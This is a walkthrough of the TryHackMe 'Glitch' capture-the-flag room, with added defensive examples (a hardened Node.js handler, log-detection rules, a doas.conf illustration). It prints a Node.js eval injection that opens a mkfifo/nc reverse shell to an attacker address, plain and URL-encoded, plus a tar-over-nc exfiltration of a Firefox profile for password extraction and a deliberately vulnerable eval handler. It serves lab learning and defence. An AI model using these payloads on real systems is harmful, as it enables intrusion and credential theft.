The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning through a question-and-answer approach. It's a comfortable way to learn using pre-designed courses that include virtual machines (VMs) hosted in the cloud.
TryHackMe Glitch Walkthrough
While the question-and-answer model does make learning easier, TryHackMe also allows users to create their own virtual classrooms to teach particular topics, enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
Good day, hacker. Spend as much time in the CLI as you can, for that's where we belong.
Glitch is an easy machine from TryHackMe that tests your ability to enumerate quickly and how solid your methodology is.
Security Problem
The app is vulnerable to command injection/execution through its use of eval. Exploit code can be passed to eval and executed, so the root of the problem is a bad programming practice in Node.js that allows an unprivileged user to supply data which is then executed on the server.
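To make the root cause concrete, here is an added example (not the room's code and not from the original post) that models the /api/items endpoint in two forms: the vulnerable one, where the cmd parameter is handed to eval, and a hardened one, where cmd is treated as data and dispatched through a fixed table. No web framework is used; the handlers take a plain {method, query} object and return {status, body}, and the ITEMS inventory is constructed for the example.

```javascript
// Added example, not the room's code: a minimal model of the /api/items
// endpoint, vulnerable form beside a hardened form. No web framework is
// used; each handler takes a plain request object {method, query} and
// returns {status, body}, so the logic runs without a server.

// Constructed sample inventory standing in for the room's item list.
const ITEMS = [
  { id: 1, name: "keyboard" },
  { id: 2, name: "mouse" },
];

// VULNERABLE: the cmd parameter goes straight into eval(), so a
// client-controlled string runs as server-side JavaScript. The catch block
// also returns the stack trace, which is how the walkthrough learns that
// the submitted value ends up inside eval.
function vulnerableItemsHandler(req) {
  if (req.method === "GET") return { status: 200, body: JSON.stringify(ITEMS) };
  if (req.method === "POST" && typeof req.query.cmd === "string") {
    try {
      return { status: 200, body: String(eval(req.query.cmd)) };
    } catch (e) {
      return { status: 500, body: e.stack }; // leaks the stack and the eval frame
    }
  }
  return { status: 405, body: "Method Not Allowed" };
}

// HARDENED: cmd is data, not code. The value is checked against a strict
// pattern, looked up in a fixed table of operations (own properties only,
// so names like "constructor" are rejected), and errors return a generic
// message instead of a stack trace.
const COMMANDS = {
  list: () => ITEMS,
  count: () => ITEMS.length,
};
const CMD_RE = /^[a-z]{1,16}$/;

function hardenedItemsHandler(req) {
  if (req.method === "GET") return { status: 200, body: JSON.stringify(ITEMS) };
  if (req.method !== "POST") return { status: 405, body: "Method Not Allowed" };
  const cmd = req.query.cmd;
  if (typeof cmd !== "string" || !CMD_RE.test(cmd) ||
      !Object.prototype.hasOwnProperty.call(COMMANDS, cmd)) {
    return { status: 400, body: "Bad Request" };
  }
  try {
    return { status: 200, body: JSON.stringify(COMMANDS[cmd]()) };
  } catch (e) {
    return { status: 500, body: "Internal Server Error" };
  }
}
```

With the vulnerable handler, a POST carrying cmd=bwm reproduces the 500 error the walkthrough sees (a ReferenceError thrown from inside eval), while cmd=1+1 returns 2. The hardened handler answers 400 to both the injection string and to lookups such as "constructor", and only ever runs the two functions in COMMANDS.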
Let's start with a quick but comprehensive nmap scan.
The scan shows that port 80 is open, so we can expect the room to revolve around a website.
Now let's run gobuster to enumerate the directories.
Let's check the content of this website. The page is almost empty, and so is its source code. Out of curiosity, I also checked the cookies.

Something looks strange here… The website sent me a cookie
with the value “value”, which is weird. Ok, let’s keep it in mind!
Gobuster says that there is a directory /secret. Let's check this page and its source code:
The page itself doesn't have a lot of content. However, in the source code we see some JavaScript and a getAccess call to an API. Let's check this:
Hmm, interesting! When we check this endpoint, we get a token. It looks base64-encoded, so let's decode it.
Perfect, we have our first flag and a token!
Let's try to change the value of the cookie to this token and refresh the page:
Amazing! The home page changed as well.
Let's check the page and its source code:
The page doesn't have a lot of information, but in the source code we can find a JavaScript file => script.js. Let's check what this script does:
Basically, the script fetches items from the API and shows them in the browser. Let's check those items => http://ipmachine/api/items
We don't have a lot of information here either. I will be honest with you, I got stuck for a while trying to figure out the next step.
Finally, I decided to take a hint.
The hint says that we should try another API method.
As a beginner, I had never played with an API before. So the only solution was to read and learn about APIs and the way they work.
Most of the time, an API works with GET, POST, DELETE, and so on. The hint says that we need to play around with those methods.
In order to change the method, I used Burp.
First, let's intercept the request:
Turn Intercept on
Go to http://ipmachine/api/items
You can see that the method is GET. Let's change GET to OPTIONS to see all the methods that we can use with this API endpoint (send the intercepted request to Repeater):
Basically, we have 3 methods that we can play around with on this endpoint: GET, HEAD and POST. We already know the result for GET. We don't get any result for HEAD. Let's try POST:

Hmm... I think we have something here, right? Someone put this message there intentionally. Maybe we are on the right track.
From here, I needed to read more about APIs and the way they work. If you are new like me, I will summarize what I learned about it and explain it in an easy way:
API
The basic goal of an API is to communicate with another application. To receive information we use the GET method. However, if we want to send information, we use the POST method.
A quick example: let's say we want to buy a BMW car and we go to a website that has a search bar, and we want to send a request to see all the “BMW” cars that they have in stock. In this example, the site communicates with another application to show the stock. The value of our search is “BMW” and the name of the variable is “cars”. The request that we send to this API will look like this:
http://ipmachine/api/items?cars=BMW
Good, we know the structure of the request, but we don't really know what POST request we need to send. We need to discover what comes after “items?” (the variable “cars” in my example). To find this out we can fuzz the request and look at the POST responses. To do this, I will use wfuzz.
PS: Just to illustrate my example, I will use “bwm” as the value that we expect:
wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt -X POST --hh 45 -u http://IPMACHINE/api/items\?FUZZ\=bwm
- · -c: show the output in colors.
- · -z: specify the payload list.
- · --hh 45: when we sent the POST request through Burp, we saw that the content length of the “matrix message” was 45. To stop showing that response, I added --hh 45; wfuzz then hides all responses whose body is 45 characters long. Indeed, this matrix message has no value for us.
- · -u: the URL that you need to fuzz.
You can see that we found a “cmd” variable that gives us a 500 error.
Basically, our request will look like this:
http://IPMACHINE/api/items?cmd=...
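From the defender's side, the fuzzing above and the eval abuse that follows both leave a clear trace in the web server's access log. The following added example (not part of the walkthrough) runs two detection rules over a handful of constructed log lines in combined format with made-up addresses: one rule spots parameter-name fuzzing against a single endpoint from one client, using the same "most responses are the same size" signal that --hh 45 relies on, and reports the parameter names whose responses differ; the other flags query values that carry Node.js code such as require("child_process"). The log content, thresholds and regular expressions are the example's own assumptions.

```javascript
// Added example (not part of the walkthrough): detection logic run over
// constructed access-log lines. It flags (1) parameter-name fuzzing against
// one endpoint from one client, where most responses share one size (the
// 45-byte "matrix" reply that wfuzz was told to hide), and (2) parameter
// values that contain Node.js code such as require("child_process").

// Constructed sample lines in combined log format (fake addresses, fake times).
const SAMPLE_LOG = `
10.0.0.5 - - [12/May/2021:10:00:01 +0000] "POST /api/items?admin=bwm HTTP/1.1" 200 45 "-" "Wfuzz/3.1.0"
10.0.0.5 - - [12/May/2021:10:00:01 +0000] "POST /api/items?debug=bwm HTTP/1.1" 200 45 "-" "Wfuzz/3.1.0"
10.0.0.5 - - [12/May/2021:10:00:02 +0000] "POST /api/items?file=bwm HTTP/1.1" 200 45 "-" "Wfuzz/3.1.0"
10.0.0.5 - - [12/May/2021:10:00:02 +0000] "POST /api/items?cmd=bwm HTTP/1.1" 500 1136 "-" "Wfuzz/3.1.0"
10.0.0.5 - - [12/May/2021:10:00:03 +0000] "POST /api/items?id=bwm HTTP/1.1" 200 45 "-" "Wfuzz/3.1.0"
10.0.0.5 - - [12/May/2021:10:05:40 +0000] "POST /api/items?cmd=require(%22child_process%22).exec(%27id%27) HTTP/1.1" 200 52 "-" "curl/7.74.0"
10.0.0.9 - - [12/May/2021:10:01:00 +0000] "GET /api/items HTTP/1.1" 200 94 "-" "Mozilla/5.0"
`;

// ip, ident, user, [time], "METHOD PATH PROTO", status, size
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)/;

// Parse lines into objects; query parameters are URL-decoded by URLSearchParams.
function parseLog(text) {
  const entries = [];
  for (const line of text.split("\n")) {
    const m = LOG_RE.exec(line.trim());
    if (!m) continue;
    let url;
    try {
      url = new URL(m[4], "http://placeholder.invalid"); // base only needed for parsing
    } catch (e) {
      continue; // unparsable request target; skip it
    }
    entries.push({
      ip: m[1], time: m[2], method: m[3], path: url.pathname,
      params: [...url.searchParams.entries()], // [[name, decodedValue], ...]
      status: Number(m[5]), size: m[6] === "-" ? 0 : Number(m[6]),
    });
  }
  return entries;
}

// Rule 1: one client sends many distinct parameter names to one path with a
// non-GET method. The modal response size is the server's "unknown
// parameter" reply; names whose responses differ from it are the outliers.
function findParamFuzzing(entries, minNames = 4) {
  const groups = new Map(); // "ip path" -> { ip, path, byName: Map<name, sizes[]> }
  for (const e of entries) {
    if (e.method === "GET" || e.params.length === 0) continue;
    const key = `${e.ip} ${e.path}`;
    if (!groups.has(key)) groups.set(key, { ip: e.ip, path: e.path, byName: new Map() });
    const g = groups.get(key);
    for (const [name] of e.params) {
      if (!g.byName.has(name)) g.byName.set(name, []);
      g.byName.get(name).push(e.size);
    }
  }
  const findings = [];
  for (const g of groups.values()) {
    if (g.byName.size < minNames) continue;
    const counts = new Map();
    for (const sizes of g.byName.values())
      for (const s of sizes) counts.set(s, (counts.get(s) || 0) + 1);
    const modalSize = [...counts.entries()].sort((a, b) => b[1] - a[1])[0][0];
    const outliers = [...g.byName.entries()]
      .filter(([, sizes]) => sizes.some((s) => s !== modalSize))
      .map(([name]) => name);
    findings.push({ ip: g.ip, path: g.path, distinctNames: g.byName.size, modalSize, outliers });
  }
  return findings;
}

// Rule 2: a query value that looks like Node.js code rather than data.
const CODE_RE = /\brequire\s*\(|child_process|process\.(?:binding|mainModule)|\bimport\s*\(/i;

function findCodeInParams(entries) {
  const findings = [];
  for (const e of entries)
    for (const [name, value] of e.params)
      if (CODE_RE.test(value)) findings.push({ ip: e.ip, time: e.time, param: name, value });
  return findings;
}

// Stand-alone run: print both rule outputs for the constructed log.
const parsed = parseLog(SAMPLE_LOG);
console.log(JSON.stringify(findParamFuzzing(parsed), null, 2));
console.log(JSON.stringify(findCodeInParams(parsed), null, 2));
```

On the sample, the first rule reports 10.0.0.5 probing /api/items with five distinct parameter names, a modal response size of 45, and cmd as the single outlier; the second rule reports the later cmd value that contains require("child_process"). In a real deployment the thresholds would be tuned and the grouping keyed by a time window as well as by client.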
Let's send this new POST request and see the result:
Interesting! We got an error, but with some extra information. The value “bwm” is executed in the eval function. We can also see that they used Node.js to build the room.
In this part, I got stuck again... So I said to myself: “Ok, this room asks us to find the content of user.txt and root.txt. So I can suppose that we will, in a certain way, have an RCE somewhere, right? Indeed, it is the only way, because it is not possible to ssh into this room.”
I tried to google something like API RCE, API reverse shell, etc. I didn't find anything. Then I tried NodeJS RCE and I found this writeup. Here CurlS explains the way she got a reverse shell by playing around with an API. So I tried sending a new POST request with her payload (you need to open a listener on your machine first):
POST REQUEST =>
/api/items?cmd=require("child_process").exec('nc+IPOFYOURMACHINE+1234+-e+/bin/sh')
Hmm... it looks very good! However, nothing happened on my listener. It looks like the payload didn't really work, but the website says that we exploited the vulnerability. Really weird, right?
But don't worry, let's move to the curl tool:
curl -X POST <machine ip>/api/items\?cmd\=ls
<title>Error</title>
So it's Node.js. Maybe I can get RCE through Node.js eval...
Reverse shell payload: Click Here
Node.js reverse shell payload: Click Here
cmd=require("child_process").exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.61.234 1234 >/tmp/f ')
OR
require("child_process").exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.61.234 1234 >/tmp/f ')
First, I must URL-encode the payload, and then it's good to go:
%63%6d%64%3d%72%65%71%75%69%72%65%28%22%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%22%29%2e%65%78%65%63%28%27%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%30%2e%38%2e%36%31%2e%32%33%34%20%31%32%33%34%20%3e%2f%74%6d%70%2f%66%20%27%29%0a%0a
With the payload encoded, let's get the reverse shell via curl in the terminal:
This shell is a bit ugly, let’s change it =>
python3 -c 'import pty;pty.spawn("/bin/bash")'
Let's find the user.txt file. Most of the time, we can find this file in the user's home directory. Let's check there first:
Perfect, we just found the second flag. Now we need to find a way to escalate privileges to root and then read the file root.txt.
When we visit the home folder, we can see that there is another user: v0id. Let's check what he has in his folder:
Nothing interesting here...
Let's list all the users:
We can see that we have 3 users of interest: user (already compromised), v0id and root.
Our goal now is to find a way to escalate our privileges:
- · horizontally (to v0id)
- · vertically (to root).
First, let's try “sudo -l”... It doesn't work. We need to find another way.
Let's go back to the user's home directory and check what is inside:
There is a hidden .firefox directory there. This directory could contain passwords saved in the Firefox browser. Maybe we can find something there.
A few months ago, I read that it is possible to decrypt the content of this profile. Let's transfer the .firefox folder to our machine and then decrypt it.
On the target machine, connect back to your machine. To do that, go to /home/user (the parent of .firefox, so the archive keeps the .firefox/ prefix we rely on later) and stream the directory through nc. This gives you access, on your machine, to all the content of the .firefox directory.
In the ROOM machine:
cd /home/user
tar cf - .firefox/ | nc IPOfYourMachine 1234
and on my machine we run:
nc -lvnp 1234 > out.tar
then let's extract the archive:
tar xvf out.tar
Now we need to change the file permission to make it executable.
As you can see, our files are extracted here...
To find all the hidden information in this directory, we can use a script created by unode (firefox_decrypt, available on GitHub):
Clone this script to your machine:
Now let's decrypt the b5w4643p.default-release profile. Our working directory is the cloned glitch-tryhackme folder, which is why we use “../”:
../.firefox/b5w4643p.default-release
Hmm, interesting! Here we can see that the user v0id used this password on the glitch.thm website. Maybe he uses the same password to log in to his Linux machine? Let's try to switch to his user:

Good, we just escalated privileges horizontally to the v0id user. Now let's find a way to escalate vertically to the root user.
Let's check the basic things (as it is an “easy” room) such as sudo -l, cron jobs, /etc/shadow, etc. Nothing special there. I also ran linpeas to check if there is something interesting, but I couldn't find anything. I got stuck here for a while...
Let's take the last hint of the room: My friend says that sudo is bloat.
I didn't have any idea what it meant, so I googled it and found this video:
Sudo Is Bloat. Use Doas Instead (YouTube video)
Basically, doas is an alternative to sudo. As we want a root shell, we need to execute a command like: sudo -u root /bin/bash. However, if you try with sudo, it doesn't work.
The video says that we can use doas instead of sudo. So let's try it:
Finally, we got root. Let's check root.txt; most of the time this file is in the root folder.
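Whether doas hands out a root shell is decided entirely by /etc/doas.conf. The walkthrough does not show the room's actual file, so the following is an added illustration, not the machine's configuration: one rule of the kind that lets a reused password become root with no further check, next to a tighter rule. The syntax is that of OpenBSD doas and OpenDoas (permit|deny, options, identity, as target, cmd/args); the command and group names are made up for the example.

```conf
# Illustrative /etc/doas.conf (added example; the room's real file is not shown
# in the walkthrough). Rule shape:
#   permit|deny [options] identity [as target] [cmd command [args ...]]

# Weak: v0id may run any command as root, and "nopass" means no password is
# asked for, so whoever lands in this account already has root.
permit nopass v0id as root

# Tighter: only members of a named group, only one fixed command with fixed
# arguments, and the caller's password is still required ("persist" caches
# the successful authentication briefly, like sudo's timestamp).
permit persist :wheel as root cmd /usr/bin/systemctl args restart nginx
```

When reviewing a host, the rules to look for are any "permit" line with "nopass" or without a "cmd" restriction for an interactive user, since each of those turns a stolen or reused password straight into root; doas also logs each authorized command through syslog unless "nolog" is set, which is what a defender would alert on.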
After several hours of trial and error, we finally got the third and last flag! It was not easy at all for me. I needed to search a lot and read a lot. However, I learned a lot!
Things that we could learn during this room:
- · Find information in JavaScript code
- · How an API works
- · Fuzz a URL with wfuzz
- · RCE through Node.js
- · Find passwords hidden in a Firefox profile folder
- · An alternative to sudo (doas)
In my opinion, they should change the difficulty of this room. Most of the concepts that we saw during this writeup are not really for beginners. They should change the difficulty to medium (intermediate).
Disclaimer
This was written for educational purposes and pentesting only.
The author will not be responsible for any damage!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal!
All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking Truth is against misuse of the information and we strongly advise against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.
All tutorials and videos have been made using our own routers, servers, websites and other resources; they do not contain any illegal activity. We do not promote, encourage, support or incite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from becoming a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.
- Hacking Truth by Kumar Atul Jaiswal
I hope you liked this post; if so, don't forget to share it.
Thank you so much :-)